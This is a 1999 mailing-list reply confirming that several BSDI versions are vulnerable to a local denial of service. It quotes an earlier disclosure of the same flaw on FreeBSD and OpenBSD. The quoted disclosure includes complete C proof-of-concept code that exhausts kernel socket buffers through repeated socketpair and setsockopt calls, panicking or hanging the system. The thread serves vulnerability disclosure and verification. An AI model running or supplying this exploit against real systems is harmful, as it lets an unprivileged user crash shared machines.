Re: Local DoS on network by unpriviledged user using setsockopt()

Tue, 7 Sep 1999 02:14:19 -0700 

Just Verified all versions of BSDI in my possession (2.1, 3.1, 4.0, 4.01)
are vulnerable.   I do not have all the details, but the kernel panics.
System eventually reboots in 2.1.

Can be executed by any non-privileged user.

JD

On Wed, 1 Sep 1999, Sven Berkvens wrote:

>Recently, I mailed this mailing to a number of people who are concerned
>with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
>mailing was NOT intended to be made public, but somehow it was. Here is
>my original mailing:
>
>
>--- Forwarded ---
>
>I stumbled across a denial of service attack on FreeBSD systems, where
>an unpriviledged user can panic the kernel. Quick and dirty testing
>(code attached at the end of this mail) showed OpenBSD is vulnerable
>too:
>
>FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
>test it on older FreeBSD versions.
>
>OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
>The kernel logs one "/bsd: mb_map full" and all processes trying to send
>something over the network get stuck waiting in mbuf. Locally the system
>continues to function. Tested by a friend.
>
>NetBSD: Not available, but it is highly probable that the affected code
>in OpenBSD is from its parent NetBSD.
>
>As far as I'm concerned, this can be handled quietly and without much
>haste. Knowledge of this problem is limited and there is absolutely no
>intention of publishing this exploit or messages to Bugtraq.
>
>With kind regards,
>Sven Berkvens ([EMAIL PROTECTED])
>Long time FreeBSD-system administrator
>
>
>
>The source code for the program that causes this:
>
>#include       <unistd.h>
>#include       <sys/socket.h>
>#include       <fcntl.h>
>
>#define                BUFFERSIZE      204800
>
>extern int
>main(void)
>{
>       int             p[2], i;
>       char            crap[BUFFERSIZE];
>
>       while (1)
>       {
>               if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
>                       break;
>               i = BUFFERSIZE;
>               setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>               setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>               setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>               setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>               fcntl(p[0], F_SETFL, O_NONBLOCK);
>               fcntl(p[1], F_SETFL, O_NONBLOCK);
>               write(p[0], crap, BUFFERSIZE);
>               write(p[1], crap, BUFFERSIZE);
>       }
>       exit(0);
>}
>
>----- End forwarded message -----
>

===========================================
John N Dvorak | [EMAIL PROTECTED]
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================

Reply via email to